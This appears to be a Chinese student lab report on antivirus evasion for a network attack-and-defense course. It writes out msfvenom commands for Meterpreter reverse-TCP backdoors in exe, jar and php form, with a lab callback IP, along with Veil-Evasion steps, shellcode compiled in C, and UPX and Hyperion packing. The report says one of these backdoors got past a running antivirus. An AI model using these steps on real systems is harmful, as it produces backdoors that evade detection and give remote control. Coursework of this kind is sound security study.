2018-2019-2 網絡對抗技術 20165320 Exp3 免殺原理與實踐

### 2018-2019-2 網絡對抗技術 20165320 Exp3 免殺原理與實踐

1、實驗內容

• 1.1 正確使用msf編碼器（0.5分），msfvenom生成如jar之類的其餘文件（0.5分），veil-evasion（0.5分），加殼工具（0.5分），使用shellcode編程（1分）

• 1.2 經過組合應用各類技術實現惡意代碼免殺(0.5分)

• 1.3 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（加分0.5）

  2、報告內容

2.1 基礎問題問答

• 殺軟是如何檢測出惡意代碼的？

  答：主要包括三個方面：

  • 基於特徵碼的檢測：特徵碼就是一段或多端數據，若是一個可執行文件（或者運行的庫、腳本等）包含這樣的數據就會被認爲是惡意代碼

  • 啓發式惡意軟件檢測：若是一個軟件在幹通是常惡意軟件乾的事，看起來就像個惡意軟件，那麼就把它看成一個惡意軟件吧（偷笑.jpg）

  • 基於行爲的惡意軟件檢測：屬於啓發式的一種，加入了行爲監控

• 免殺是作什麼？

  答：經過修改惡意軟件或惡意代碼讓其可以不被殺毒軟件檢測出來。

• 免殺的基本方法有哪些？

  答：整體技術有以下：

  • 改變特徵碼：若是有exe文件，就對它進行加殼（壓縮、加密）、若是有shellcode，就用encode進行編碼，基於playload從新編譯生成可執行文件、若是有源代碼，用其它語言進行重寫再編譯

  • 改變行爲：通信方式方面儘可能使用反彈鏈接、隧道技術、通信數據加密，操做模式方面最好基於內存操做、減小對系統的修改、加入混淆做用的正常功能代碼

  • 很是規的辦法：使用一個有漏洞的應用當成後門，社會工程學（無敵）、純手工打造一個惡意軟件

• 開啓殺軟能絕對防止電腦中惡意代碼嗎？

  答：經過此次實驗，很明顯知道這是不可能的事情

2.2 實驗過程

1、正確使用msf編碼器（0.5分），msfvenom生成如jar之類的其餘文件（0.5分），veil-evasion（0.5分），加殼工具（0.5分），使用shellcode編程（1分）

正確使用msf編碼器

• 這裏我和其它同窗同樣，使用實驗二中msf生成的簡單後門程序放到virscan網站中進行掃描（文件名還不能開頭爲數字），發現這個未經處理的後門不堪重任。

• 使用360衛士對它進行掃描：

• 而後按照老師上課時的步驟，對這個文件進行屢次編碼，使用到的指令以下：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.123 LPORT=5320 -f exe > coded10.exe

• 拿新生成的文件去驗一下貨，結果是一頓操做猛如虎，一看戰績0槓5，花裏胡哨罷了，並無什麼卵用

• 拿360衛士對它進行掃描

• msfvenom生成如jar之類的其餘文件

  • 首先使用msf試着生成一個.jar類型的文件，指令以下：msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.123 lport=5320 x> 20165320_backdoor_java.jar
  • 出乎意料的是，.jar文件，只有六款殺軟能殺出來，簡直不敢相信
  • 拿360衛士對它進行掃描
  • 而後用msf試着生成一個.php類型的文件，指令以下：msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.123 lport=443 x> backdoor5320.php
  • 而後將它放入virscan進行掃描，發現僅僅只有2%的機率被AV檢測到，並且這兩款都是須要付費的國外軟件
  • 固然，360也確定掃不出來
  • 使用msf生成其它類型的後門相關命令能夠參考網上相關博客：經過Metasploit生成各類後門

veil-evasion生成後門程序及檢測

• PS：我以爲整個實驗最難的部分就是veil的安裝了，調試了一個晚上也沒能成功，不是安裝Python3.4的時候出錯，就是卡在展開對象的位置，最後仍是拷了同窗的虛擬機，總而言之，裝東西仍是隨緣

• 安裝後（拷完虛擬機後），命令行中輸入veil進入控制界面

• 輸入use evasion進入evasion

• 輸入use c/meterpreter/rev_tcp.py開始對後門程序設置相關的參數

• 而後設置反彈回連的IP、端口號

• 設置完參數以後輸入generate生成後門程序

• 拿veil生成的文件放到virscan進行掃描測試：

• 用360對它進行掃描，表示很無辜的被發現了

半手工注入Shellcode並執行

• 從新回到原來的Kali虛擬機，在命令行中輸入命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=5320 -f c用c語言生成一段shellcode

• vim一個以下的.c文件

• 使用命令i686-w64-mingw32-g++ bcak20165320.c -o back20165320.exe生成一個可執行文件

• 將該文件拷到virscan網站上進行掃描

• 將該文件用360進行掃描，出乎意料地發現這麼簡單的操做360竟然發現不了

• 雖然360掃描的時候沒發現問題，執行的時候仍是被抓住了

執行加殼操做

• 對剛剛生成的半手工shellcode程序加上一個壓縮殼，使用指令 upx 源文件 -o 目標文件

• 放入virscan文件中檢測一下

• 執行的時候360直接發現

• 嘗試對半手工shellcode程序加上一個加密殼，將上例的文件放入到/usr/share/windows-binaries/hyperion/目錄，進入該目錄，使用命令wine hyperion.exe -v 源文件 目標文件

• 添加加密殼的文件仍是不能經過virscan網站的檢測，也不能經過360的掃描

實現免殺

• 有兩種方法：一種是經過將veil生成的文件進行加殼操做、還有一種是經過將shellcode放入本機的C語言編譯器，進行編譯運行（經過參考大佬們的博客發現的，並且，頗有可能過一兩天就不行了，供上一張截圖）

---

用另外一臺電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

• 仍是按照上面免殺的方法，將我生成的一段shellcode，發送給個人好室友，個人好室友使用VC編譯運行，在殺軟運行的狀況下，回連成功，截圖與殺軟版本號以下：

---

心得體會

• 這一次的實驗讓我明白了殺軟並無什麼卵用，它可以進行掃描查殺病毒的基礎是病毒庫，因此只要你可以拿到在它的病毒庫裏沒有記錄過的後門程序或者軟件，那麼就很容易對運行殺軟的主機進行攻擊，因此之後在使用電腦的過程當中，就算裝了殺軟，也要注意上網過程不要下載一些不安全的軟件。還有就是，不一樣的殺軟，掃描查殺病毒的能力也良莠不齊，360做爲老牌殺軟，能力仍是不錯的，雖然比起國外的付費軟件，差距仍是有點大，但和國內的相比，仍是優點很明顯，總而言之，網絡攻防，有攻纔有防，只要你能想出新的戰術，就能破解敵方落後的防護工事。